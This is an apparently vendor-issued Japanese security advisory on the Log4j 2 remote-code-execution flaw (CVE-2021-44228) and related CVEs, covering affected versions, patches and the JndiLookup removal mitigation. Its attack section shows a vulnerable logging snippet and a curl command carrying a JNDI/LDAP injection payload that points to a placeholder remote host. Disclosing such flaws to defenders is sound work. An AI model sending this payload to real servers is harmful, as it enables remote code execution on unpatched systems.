Posted By Hansoyoung , 2021年 December 14日

Apache Log4j 2 脆弱性に注意、およびアップデートの推奨

Apache Log4j 2 脆弱性(CVE-2021-44228)が2021年12月10日、POC と共に Twitter および Github に公開された。この脆弱性は Log4j ソフトウェアのリモートコード実行(RCE)の脆弱性であり、ログメッセージにリモートの Java オブジェクトのアドレスを含ませ、脆弱なサーバーで実行させることができる。これはアリババのクラウドセキュリティチームが2021年11月24日に Apache ソフトウェア財団に最初に報告したものであり、最初のパッチは2021年12月6日に配布された。その後もパッチが配布され続けており、その内容は以下の通りである。

1. 脆弱性の対象およびバージョン

以下の条件と一致する製品は、この脆弱性の影響を受ける。

Apache Log4j 2.0-beta9 ~ 2.12.1 および 2.13.0 ~ 2.15.0 バージョン
Apache Log4j 1.2.x のすべてのバージョン

2. 脆弱性を利用した攻撃の方法

Log4j を利用するサービスにおいて user-agent で送信された文字列をログとして記録するコードが含まれている場合、以下のように攻撃を実行することができる。

[サーバーソースコードの一部]

static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());
...
String userAgent = he.getRequestHeader("user-agent");    
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...

[脆弱性を利用した攻撃]

xxx.xxx.xxx.xxx/a に位置する Java オブジェクトを自動でサーバーから実行させる攻撃
ex) # curl 127.0.0.1:8080 -H ‘X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}’

3. 解決済みの脆弱性

Log4j 2.x バージョンにおいて、攻撃者がログメッセージによって遠隔でコード実行が可能な脆弱性 (CVE-2021-44228, CVSS 10.0)
Log4j 2.x バージョンにおいて、攻撃者がログメッセージによってサービス妨害エラー(Denied of Service)を発生させることのできる脆弱性 (CVE-2021-45046, CVSS 3.7)
Log4j 1.2.x バージョンにおいて、攻撃者がログメッセージによって遠隔でコード実行が可能な脆弱性 (CVE-2021-4104)

4. AhnLab 製品の対応現況

1) 2021年12月14日のアップデートを通じて脆弱性パッチが以下のように提供

Log4j 2.16.0 以上の最新バージョン(Java8以上) :https://logging.apache.org/log4j/2.x/download.html
Log4j 2.12.2 バージョン(Java 7) : 提供予定

2) Log4j のパッチが困難な場合、脆弱性緩和適用ソリューション (ATIP セキュリティ勧告文を参照)

バージョン : Log4j 2.0-beta9 以上 2.15.0 以下のバージョン(Log4j 2.12.2 バージョンは除外)
JndiLookup クラスを以下のように削除
# zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
バージョン : Log4j 1.x バージョン
Log4j 1.x で JMSAppender 使用状況を確認後、該当機能の停止